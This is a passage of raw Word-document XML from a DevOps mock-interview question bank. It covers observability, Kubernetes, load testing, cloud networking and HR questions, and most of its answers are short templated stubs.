          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API development is about exposing a controlled interface for clients to interact with backend business logic and data. A good API defines clear endpoints, request and response schemas, authentication, authorization, validation, error handling, versioning, observability, and documentation. In production, API work is not only writing routes. It includes database access patterns, rate limiting, security headers, logging, tracing, performance testing, backward compatibility, and deployment strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. How would you build an observability namespace?</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build an observability namespace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Which services would you use for metrics, logs, and traces?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services would you use for metrics, logs, and traces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. How would you integrate Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Grafana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integrate Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. What exactly is OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/OpenTelemetry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exactly is OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. OpenTelemetry is only a collector; what backend services would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/OpenTelemetry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OpenTelemetry is only a collector; what backend services would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. How would Grafana connect to those services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Grafana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Grafana connect to those services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Suppose millions of users access your API. How would you design a scalable Kubernetes solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scalability/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Scalability/Kubernetes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millions of users access your API. How would you design a scalable Kubernetes solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. How would you determine your scaling strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Scalability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determine your scaling strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. How would you estimate the number of pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scalability/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Scalability/Kubernetes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estimate the number of pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. How would you perform load testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Testing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perform load testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. Can you generate 5,000 requests per second?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Testing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generate 5,000 requests per second?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Which load-testing tools would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Testing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load-testing tools would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. How is your understanding of the latest GenAI/MLOps journey?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI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your understanding of the latest GenAI/MLOps journey?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Do you have any questions for me?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Behavioral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any questions for me?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. Where are you currently based?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Behavioral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are you currently based?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. What is your native place?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Behavioral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native place?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 72 - Kubernetes Terraform Observability and MLOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Explain CNI in Kubernetes.</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CNI in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Which CNI have you worked on?</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CNI have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Do you have experience with a Service Mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Service Mesh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experience with a Service Mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Can you explain what a Service Mesh is?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Service Mesh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what a Service Mesh is?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is the difference between a Deployment and a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Workloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Workloads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 Deployment and a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do Liveness and Readiness probes differ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Probes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Probes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Liveness and Readiness probes differ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is a Sidecar container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Containers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Sidecar container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Ingress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an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you handle Pod Autoscaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Autoscaling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Pod Autoscaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is a Kubernetes Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Secrets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Kubernetes Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What is BusyBox?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Kubernetes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BusyBox?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What does etcd store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/etcd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etcd store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Does etcd store namespaces and storage configurations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/etcd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etcd store namespaces and storage configurations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What is Blue-Green Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Deployment Strategies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blue-green deployment runs two environments: the current production version and the new version. Traffic is switched to the new environment after validation, and rollback is fast by switching traffic back.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Blue-green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Q15. What is the use of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use of Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What is the difference between AWS VPC, Azure VNet, and GCP VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud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AWS VPC, Azure VNet, and GCP VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you connect on-premises resources with cloud resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Hybrid Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Hybrid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connect on-premises resources with cloud resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. What is a VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VPC (Virtual Private Cloud) is an isolated, logically-defined private network within a cloud provider where you control IP ranges, subnets, routing, and connectivity for your resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How many Kubernetes clusters do you require in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Architecture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many Kubernetes clusters do you require in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How does a Load Balancer distribute traffic between services, for example 50-50?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Balancing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 Load Balancer distribute traffic between services, for example 50-50?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What is mTLS?</w:t>
      </w:r>
